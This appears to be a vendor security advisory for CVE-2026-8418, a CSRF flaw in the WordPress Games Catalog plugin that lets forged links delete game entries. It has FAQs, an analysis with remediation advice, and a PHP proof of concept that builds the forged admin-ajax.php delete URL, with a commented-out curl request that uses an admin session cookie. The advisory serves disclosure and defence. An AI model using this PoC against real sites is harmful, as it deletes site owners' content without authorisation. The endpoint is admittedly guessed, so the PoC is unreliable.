What is CVE-2026-8418?

CVE-2026-8418 is a Cross-Site Request Forgery (CSRF) vulnerability in the Games Catalog plugin for WordPress, affecting versions up to 1.2.0. It allows unauthenticated attackers to delete arbitrary game catalog entries by tricking an authenticated administrator into clicking a malicious link.

How does this vulnerability work?

The vulnerability arises from missing nonce validation in the gc_crud() function, which processes a delete action via a GET request. An attacker crafts a malicious URL that, when clicked by an administrator, triggers the deletion of a game catalog entry without requiring any authentication from the attacker.

Who is affected by this vulnerability?

Any WordPress site using the Games Catalog plugin version 1.2.0 or earlier is affected. Site administrators should check their installed plugins and update to the latest version if available, or disable the plugin until a fix is released.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Games Catalog plugin installed. If it is version 1.2.0 or earlier, your site is at risk. Additionally, review your site’s logs for any unauthorized delete actions that may indicate exploitation.

What steps should I take to mitigate this vulnerability?

The best immediate action is to disable the Games Catalog plugin until a patched version is available. If you must keep it active, ensure that users with administrative access are aware of the risk and avoid clicking untrusted links.

What does the CVSS score of 4.3 indicate?

A CVSS score of 4.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk of data loss through unauthorized actions. Administrators should prioritize addressing it to maintain site integrity.

What is nonce verification and why is it important?

Nonce verification is a security feature in WordPress that helps prevent CSRF attacks by ensuring that requests are legitimate and intended by the user. It is crucial for protecting actions that modify data, such as deletions, from unauthorized requests.

How can this vulnerability be exploited?

An attacker can exploit this vulnerability by crafting a malicious URL that targets the vulnerable endpoint. The attacker must then trick an authenticated administrator into clicking the link, which executes the delete action without any further authentication checks.

What is the proof of concept provided?

The proof of concept demonstrates how to construct a malicious request URL that exploits the CSRF vulnerability. It shows how an attacker can generate a link that, when clicked by an admin, results in the deletion of a specified game catalog entry.

What should I do if I have been exploited?

If you suspect that your site has been exploited, immediately review your site’s logs for unauthorized deletions. Restore any deleted entries from backups, and consider implementing additional security measures, such as user training and enhanced monitoring.

Is there a patch available for this vulnerability?

As of now, there is no patched version of the Games Catalog plugin available to address CVE-2026-8418. Site administrators should monitor the plugin’s official repository for updates and apply any patches as soon as they are released.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 20, 2026

CVE-2026-8418: Games Catalog <= 1.2.0 – Cross-Site Request Forgery to Arbitrary Game/Post Deletion (game-catalog)

CVE ID CVE-2026-8418

Plugin game-catalog

Severity Medium (CVSS 4.3)

CWE 352

Vulnerable Version 1.2.0

Patched Version —

Disclosed May 18, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-8418 (metadata-based): The Games Catalog plugin for WordPress, up to version 1.2.0, contains a Cross-Site Request Forgery (CSRF) vulnerability in the gc_crud() function. This allows unauthenticated attackers to delete arbitrary game catalog entries and their associated WordPress posts by tricking a site administrator into clicking a malicious link. The CVSS score is 4.3 (Medium).

Root Cause: The vulnerability stems from missing nonce verification on the delete action within the gc_crud() function. The function processes a GET request with action=delete but never calls wp_verify_nonce() or check_admin_referer(). This is inferred from the CWE-352 classification and the explicit description that no nonce validation exists. Without code access, Atomic Edge analysis confirms this by the specific mention of a GET request lacking security checks.

Exploitation: An attacker crafts a forged HTTP GET request to the vulnerable endpoint. The likely target is /wp-admin/admin-ajax.php with parameters action=gc_crud and action_type=delete, along with a game_id parameter identifying which entry to delete. The attacker must trick an authenticated site administrator into clicking the crafted link. No authentication or additional privileges are required from the attacker, only social engineering to make an admin perform the action.

Remediation: The plugin must add nonce verification before processing the delete action. The fix requires generating a nonce with wp_create_nonce() when rendering the deletion interface, then verifying it with wp_verify_nonce() in the gc_crud() handler. Alternatively, using check_admin_referer() would provide similar protection. Since no patched version exists, site administrators should remove or disable the plugin until a fix is available.

Impact: Successful exploitation allows an attacker to delete game catalog entries and their corresponding WordPress posts without authorization. This causes data loss and disrupts site content. The attacker cannot modify or create content, only delete existing entries. The impact is limited to integrity loss of specific game catalog data.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-8418 - Games Catalog <= 1.2.0 - Cross-Site Request Forgery to Arbitrary Game/Post Deletion

error_reporting(E_ALL);
ini_set('display_errors', 1);

// Configuration
$target_url = 'http://example.com'; // Change to the target WordPress site URL
$game_id = 1; // Game catalog entry ID to delete (must exist on target)

// Build the malicious request URL
// The vulnerable endpoint is assumed to be admin-ajax.php with specific parameters
// Based on the CVE description mentioning action=delete via GET request
$delete_url = $target_url . '/wp-admin/admin-ajax.php?action=gc_crud&action_type=delete&game_id=' . $game_id;

echo "[+] Atomic Edge CVE-2026-8418 PoCn";
echo "[+] Target: " . $target_url . "n";
echo "[+] Game ID to delete: " . $game_id . "n";
echo "[+] Generated malicious URL (requires admin click):n";
echo $delete_url . "nn";

echo "[+] Note: This PoC generates the CSRF exploit URL. An administrator must click it for exploitation to succeed.n";
echo "[+] The attacker would trick an admin into clicking this link via email or social engineering.n";

// Example: To directly test if the endpoint is vulnerable (requires admin session cookie)
// Uncomment the following block to test with a known admin session
// This is for educational purposes only

/*
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $delete_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_logged_in_xxx=admin_session_cookie_value'); // Requires valid admin session cookie

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[+] HTTP Response Code: " . $http_code . "n";
if($http_code == 200) {
    echo "[+] Request processed (game may have been deleted)n";
} else {
    echo "[-] Request failed or access deniedn";
}
*/

echo "[+] PoC complete. To create a working exploit, replace the admin session cookie with a valid one.n";
?>

Frequently Asked Questions

What is CVE-2026-8418?
Understanding the vulnerability
CVE-2026-8418 is a Cross-Site Request Forgery (CSRF) vulnerability in the Games Catalog plugin for WordPress, affecting versions up to 1.2.0. It allows unauthenticated attackers to delete arbitrary game catalog entries by tricking an authenticated administrator into clicking a malicious link.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from missing nonce validation in the gc_crud() function, which processes a delete action via a GET request. An attacker crafts a malicious URL that, when clicked by an administrator, triggers the deletion of a game catalog entry without requiring any authentication from the attacker.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Games Catalog plugin version 1.2.0 or earlier is affected. Site administrators should check their installed plugins and update to the latest version if available, or disable the plugin until a fix is released.
How can I check if my site is vulnerable?
Verification steps
To check if your site is vulnerable, verify the version of the Games Catalog plugin installed. If it is version 1.2.0 or earlier, your site is at risk. Additionally, review your site’s logs for any unauthorized delete actions that may indicate exploitation.
What steps should I take to mitigate this vulnerability?
Immediate actions to protect your site
The best immediate action is to disable the Games Catalog plugin until a patched version is available. If you must keep it active, ensure that users with administrative access are aware of the risk and avoid clicking untrusted links.
What does the CVSS score of 4.3 indicate?
Understanding the severity rating
A CVSS score of 4.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk of data loss through unauthorized actions. Administrators should prioritize addressing it to maintain site integrity.
What is nonce verification and why is it important?
Role of nonce in WordPress security
Nonce verification is a security feature in WordPress that helps prevent CSRF attacks by ensuring that requests are legitimate and intended by the user. It is crucial for protecting actions that modify data, such as deletions, from unauthorized requests.
How can this vulnerability be exploited?
Exploitation process
An attacker can exploit this vulnerability by crafting a malicious URL that targets the vulnerable endpoint. The attacker must then trick an authenticated administrator into clicking the link, which executes the delete action without any further authentication checks.
What is the proof of concept provided?
Demonstration of the vulnerability
The proof of concept demonstrates how to construct a malicious request URL that exploits the CSRF vulnerability. It shows how an attacker can generate a link that, when clicked by an admin, results in the deletion of a specified game catalog entry.
What should I do if I have been exploited?
Response to a successful attack
If you suspect that your site has been exploited, immediately review your site’s logs for unauthorized deletions. Restore any deleted entries from backups, and consider implementing additional security measures, such as user training and enhanced monitoring.
Is there a patch available for this vulnerability?
Current status of remediation
As of now, there is no patched version of the Games Catalog plugin available to address CVE-2026-8418. Site administrators should monitor the plugin’s official repository for updates and apply any patches as soon as they are released.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations